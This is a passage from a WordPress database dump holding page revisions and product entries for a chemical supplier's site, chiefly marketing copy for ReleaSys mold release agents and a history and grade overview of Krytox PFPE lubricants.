non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,   but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 16:36:20', '2017-06-01 16:36:20', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4399, 3, '2017-06-01 16:37:12', '2017-06-01 16:37:12', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane  (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,   but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 16:37:12', '2017-06-01 16:37:12', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4400, 3, '2017-06-01 16:38:34', '2017-06-01 16:38:34', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 16:38:34', '2017-06-01 16:38:34', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4401, 2, '2017-06-01 17:13:02', '0000-00-00 00:00:00', '<div class="" data-block="true" data-editor="4ld3p" data-offset-key="2g7kt-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="2g7kt-0-0"><span class="veryhardreadability"><span data-offset-key="2g7kt-0-0"><span data-text="true">Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability</span></span></span><span data-offset-key="2g7kt-1-0"><span data-text="true">. </span></span><span class="veryhardreadability"><span data-offset-key="2g7kt-2-0"><span data-text="true">Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gearbox lubricant, and even gyroscope oil</span></span></span><span data-offset-key="2g7kt-3-0"><span data-text="true">.</span></span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="9itk8-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9itk8-0-0"><span data-offset-key="9itk8-0-0"> </span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="cv1b9-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="cv1b9-0-0"><span class="hardreadability"><span data-offset-key="cv1b9-0-0"><span data-text="true"> In 1964, new perfluoropolyether (PFPE)-based grease formulations, developed with the U.S. Navy and Air Force</span></span></span><span data-offset-key="cv1b9-1-0"><span data-text="true">. The result being MIL-G-27617, developed for Krytox. </span></span><span class="hardreadability"><span data-offset-key="cv1b9-2-0"><span data-text="true">The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965</span></span></span><span data-offset-key="cv1b9-3-0"><span data-text="true">.</span></span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="64r3u-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="64r3u-0-0"><span data-offset-key="64r3u-0-0"> </span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="5hme3-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="5hme3-0-0"><span class="complexword"><span data-offset-key="5hme3-0-0"><span data-text="true">Prior to</span></span></span><span class="hardreadability"><span data-offset-key="5hme3-1-0"><span data-text="true"> 1981, the only </span></span></span><span class="adverb"><span data-offset-key="5hme3-2-0"><span data-text="true">commercially</span></span></span><span class="hardreadability"><span data-offset-key="5hme3-3-0"><span data-text="true"> available Krytox lubricants were aerospace oil and greases</span></span></span><span data-offset-key="5hme3-4-0"><span data-text="true">. </span></span><span class="hardreadability"><span data-offset-key="5hme3-5-0"><span data-text="true">Since then, a very wide range of industries and applications adopted PFPE-based oils and greases</span></span></span><span data-offset-key="5hme3-6-0"><span data-text="true">. </span></span><span class="veryhardreadability"><span data-offset-key="5hme3-7-0"><span data-text="true">There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, military applications—to name a few</span></span></span><span data-offset-key="5hme3-8-0"><span data-text="true">.</span></span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="esvj7-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="esvj7-0-0"><span data-offset-key="esvj7-0-0"> </span></div>\n</div>\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="4v7hq-0-0"><span data-offset-key="4v7hq-0-0"><span data-text="true">Krytox Today</span></span></div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="rt0-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="rt0-0-0"><span data-offset-key="rt0-0-0"> </span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="e5qsg-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="e5qsg-0-0"><span data-offset-key="e5qsg-0-0"><span data-text="true">Today, it’s our high-performance synthetic lubricants used for a variety of applications. The oils </span></span><span class="passivevoice"><span data-offset-key="e5qsg-1-0"><span data-text="true">are created</span></span></span><span data-offset-key="e5qsg-2-0"><span data-text="true"> from fluorine, carbon, and oxygen. </span></span><span class="veryhardreadability"><span data-offset-key="e5qsg-3-0"><span data-text="true">A mixture of compounds known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE)</span></span></span><span data-offset-key="e5qsg-4-0"><span data-text="true">. </span></span><span class="veryhardreadability"><span data-offset-key="e5qsg-5-0"><span data-text="true">These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions</span></span></span><span data-offset-key="e5qsg-6-0"><span data-text="true">.</span></span>  In comparison, hydrocarbon alternatives perform <span class="adverb"><span data-offset-key="e5qsg-7-0"><span data-text="true">poorly</span></span></span><span data-offset-key="e5qsg-8-0"><span data-text="true">. </span></span><span class="hardreadability"><span data-offset-key="e5qsg-9-0"><span data-text="true">And, with a global distribution network and world-class technical service, it is the lubricant of choice</span></span></span><span data-offset-key="e5qsg-10-0"><span data-text="true">.</span></span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="9vvdk-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9vvdk-0-0"><span data-offset-key="9vvdk-0-0"> </span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="5e6dg-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="5e6dg-0-0"><span class="veryhardreadability"><span data-offset-key="5e6dg-0-0"><span data-text="true">The use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines</span></span></span><span data-offset-key="5e6dg-1-0"><span data-text="true">. </span></span><span class="veryhardreadability"><span data-offset-key="5e6dg-2-0"><span data-text="true">Many greases are also available with anti-wear and anti-corrosion additives to further boost performance in critical operations</span></span></span><span data-offset-key="5e6dg-3-0"><span data-text="true">.</span></span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="bgks1-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="bgks1-0-0"><span data-offset-key="bgks1-0-0"> </span></div>\n</div>\n<div class="" data-block="true" data-editor="4ld3p" data-offset-key="abrsu-0-0">\n<div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="abrsu-0-0"><span class="veryhardreadability"><span data-offset-key="abrsu-0-0"><span data-text="true">Krytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics</span></span></span><span data-offset-key="abrsu-1-0"><span data-text="true">. </span></span><span class="veryhardreadability"><span data-offset-key="abrsu-2-0"><span data-text="true">With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute </span></span></span><span class="adverb"><span data-offset-key="abrsu-3-0"><span data-text="true">significantly</span></span></span><span class="veryhardreadability"><span data-offset-key="abrsu-4-0"><span data-text="true"> to lowering the cost of doing business</span></span></span><span data-offset-key="abrsu-5-0"><span data-text="true">.</span></span></div>\n</div>', '', '', 'draft', 'closed', 'closed', '', '', '', '', '2017-06-01 17:13:02', '2017-06-01 17:13:02', '', 0, 'https://www.miller-stephenson.com/?page_id=4401', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (4402, 3, '2017-06-01 17:25:09', '2017-06-01 17:25:09', '<h2>ReleaSys™ RM | Rotational Molding Release Agent</h2>\r\n<h3>Innovative Chemistry; Exceptional Longevity, Ease of Release, and Surface Quality</h3>\r\nMiller-Stephenson\'s ReleaSys™ RM Rotational molding release agent combines over 50 years of release agent expertise and thermoplastic molding experience. Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles, tighter tolerances, and complex molds. ReleaSys RM is heat stable to 600°F, cures rapidly (even at room temperature), and transfers no mold release to the part.  These exceptional performance characteristics are due to this rotational molding release agent\'s usage of a proprietary formulation which tenaciously binds to the mold surface, providing a high-slip, robust barrier that is extremely abrasion resistance. The low surface energy of our coating, enhances flow of the melting resin, minimizing surface defects and decreasing cycle times. Benefits of utilizing ReleaSys RM Rotational Molding release agent are the following:\r\n<ul>\r\n 	<li>Multiple releases from a single application</li>\r\n 	<li>No Transfer</li>\r\n 	<li>Lower Scrap</li>\r\n 	<li>Reduced Pigment Build-up; Better Cosmetics</li>\r\n 	<li>Increased Productivity through reduced downtime</li>\r\n 	<li>No VOC, no Odor; Waterbased formulation</li>\r\n</ul>\r\nProducing a high quality, dimensionally-controlled rotomolded part would be easy if all parts were the same shape and size, but they are not. For example, a fuel cell for a marine application usually needs to be molded in a shape that will allow it to fit into a very irregular and tight space envelope. A Silo-style storage tank, on the other hand, is a large and regular in shape. The demands placed on the release agent for these two applications are very different. The marine gas tank will usually require a release agent that provides excellent resin flow during the molding process and maximum assistance when releasing from the mold.  The large water storage-tank requires similar flow assistance but a modified slip-level to prevent pre-release or other defects. Thanks to Miller-Stephenson\'s extensive expertise in the rotomolding industry we understand the problems rotomolders experience and have developed specialized rotational molding release agents to meet these specific requirements.\r\n<h3>Miller-Stephenson can customize a ROTOMOLDING release agent for your specific needs</h3>\r\nMiller-Stephenson prides itself on having a robust and dynamic R&amp;D facility which can efficiently and quickly develop a customize formula for your specific rotational molding operation. We typically find this is necessary if a mold has particularly challenging undercuts, scuppers, bolts, pins or drafts. Our team will find an immediate solution to your unique challenges and delivery a rotational molding release agent to meet not only your performance requirements, but your cost requirements as well.\r\n<h3>Application Specifics</h3>\r\nReleaSys RM rotational molding release products should be applied via any method which delivery fine atomization or via a microfiber cloth.  Ideally the mold surface would be between 20°C (68°F) and 205°C (400°F). Spray application is recommended, although brushing or wiping may also be used. Optimum multiple release performance is obtained by applying to molds preheated above 60°C (140°F). The ease of release, number of releases/application and surface finish will depend on application technique, mold temperature and number of coats applied.\r\n<ul>\r\n 	<li>LLDPE, LDPE, MDPE, HDPE, XLPE,</li>\r\n 	<li>Polypropylene (PP)</li>\r\n 	<li>Nylon / Polyamide</li>\r\n 	<li>Polycarbonate.</li>\r\n</ul>\r\n<h3>ReleaSys RM | Rotational Molding Release Agent</h3>\r\nFor any assistance with proper application, storage, or general technical assistance please see the links below or call our technical service line.  Miller-Stephenson has a team of molding release experts ready to help you.  Our pedigree in the molding industry and relationship with molding operations both large and small provides our technical team with a dynamic perspective, and we hold the skills and experience needed to make sure your molding operation is cost-effective, efficient, and most importantly, safe.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'ReleaSys™ RM | Rotational Molding Release Agent', 'Miller-Stephenson\'s ReleaSys™ RM Rotational molding release agent combines over 50 years of release agent expertise and thermoplastic molding experience. These formulations are tailored to meet ROTOMOLDING efficiency challenges such as shorter, hotter cycles and tight-tolerance, complex molds. ReleaSys RM is heat stable to 600°F, cures rapidly (even at room temperature), and transfers no mold release to the part. With ReleaSys RM, customers achieve multiple releases, no transfer, reduced pigment build-up, lower scrap rates, better cosmetics, increased productivity, and the safety of a water-based system. Benefits include:\r\n<ul>\r\n 	<li>Multiple Releases per Application</li>\r\n 	<li>Rapid Cure; No Transfer</li>\r\n 	<li>Superior Adhesion and Durability</li>\r\n 	<li>Heat Stable up to 600°F</li>\r\n 	<li>Optimized Resin Flow</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'rotational-molding-release-agent', '', '', '2017-06-24 15:42:44', '2017-06-24 15:42:44', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4402', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4403, 2, '2017-06-01 17:13:12', '2017-06-01 17:13:12', '<h2 style="text-align: center;">Krytox History &amp; Product Overview</h2>\r\n<h3><strong>For the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a></strong></h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gearbox lubricant, and even gyroscope oil.\r\n\r\nIn 1964, new perfluoropolyether (PFPE)-based grease formulations, developed jointly with the U.S. Navy and Air Force. The result being MIL-G-27617, developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, a very wide range of industries and applications adopted PFPE-based oils and greases. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil &amp; 20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a 